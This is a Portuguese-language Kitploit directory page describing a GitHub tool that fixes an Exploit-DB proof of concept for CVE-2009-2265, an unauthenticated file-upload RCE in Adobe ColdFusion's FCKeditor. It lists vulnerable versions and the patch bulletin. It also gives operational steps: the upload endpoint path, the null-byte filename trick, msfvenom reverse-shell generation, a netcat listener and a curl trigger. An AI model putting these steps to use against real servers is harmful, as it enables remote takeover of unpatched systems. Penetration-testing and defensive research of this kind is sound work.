Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2009-2265-fix — correção para script de exploit que não funciona no exploitdb (50057.py) | Kitploit
Ferramentas/GitHubGitHub/hd-exe/cve-2009-2265-fix
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubhd-exe/cve-2009-2265-fix

CVE-2009-2265-fix

correção para script de exploit que não funciona no exploitdb (50057.py)

Ver Repositório
há 14h 28mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2009-2265 - Adobe ColdFusion RCE

Execução remota de código não autenticada por meio de upload arbitrário de arquivos no componente FCKeditor incluído no ColdFusion. O endpoint de upload de arquivos aceita uma injeção de byte nulo no parâmetro filename, permitindo que um webshell JSP seja enviado e executado diretamente pelo servidor.

Versões Vulneráveis

VersãoStatus
ColdFusion 8.0Vulnerável
ColdFusion 8.0.1Vulnerável
ColdFusion 9.0Vulnerável*
ColdFusion MX 6.xVulnerável
ColdFusion MX 7.xVulnerável
ColdFusion 9.0.1+Corrigido
ColdFusion 10+Não afetado

*ColdFusion 9.0 vulnerável se o componente FCKeditor não for removido/atualizado.

Patch: Adobe Security Bulletin APSB09-09 (julho de 2009).

Uso

Edite as variáveis no topo do script:

root@kitploit:~
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500

Execute:

root@kitploit:~
python3 poc.py

O script irá:

  1. Gerar um reverse shell JSP via msfvenom
  2. Enviá-lo ao alvo por meio do endpoint do FCKeditor
  3. Iniciar um listener nc na lport
  4. Acionar o shell automaticamente

Se o shell não chegar em alguns segundos, acione-o manualmente:

root@kitploit:~
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp

O nome do arquivo é impresso em stdout após o upload.

Requisitos

root@kitploit:~
msfvenom
netcat (nc)
python3

Endpoint Vulnerável

root@kitploit:~
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm

Observações

  • A porta padrão do ColdFusion é 8500 (HTTP) ou 8300 (HTTPS)
  • Os arquivos enviados ficam em /userfiles/file/
  • O byte nulo (%00) no parâmetro CurrentFolder trunca o nome do arquivo, de modo que o servidor armazena o arquivo com extensão .jsp apesar de o upload parecer .txt
  • Em alvos Windows o shell será cmd.exe, em Linux /bin/sh
Baixar ferramenta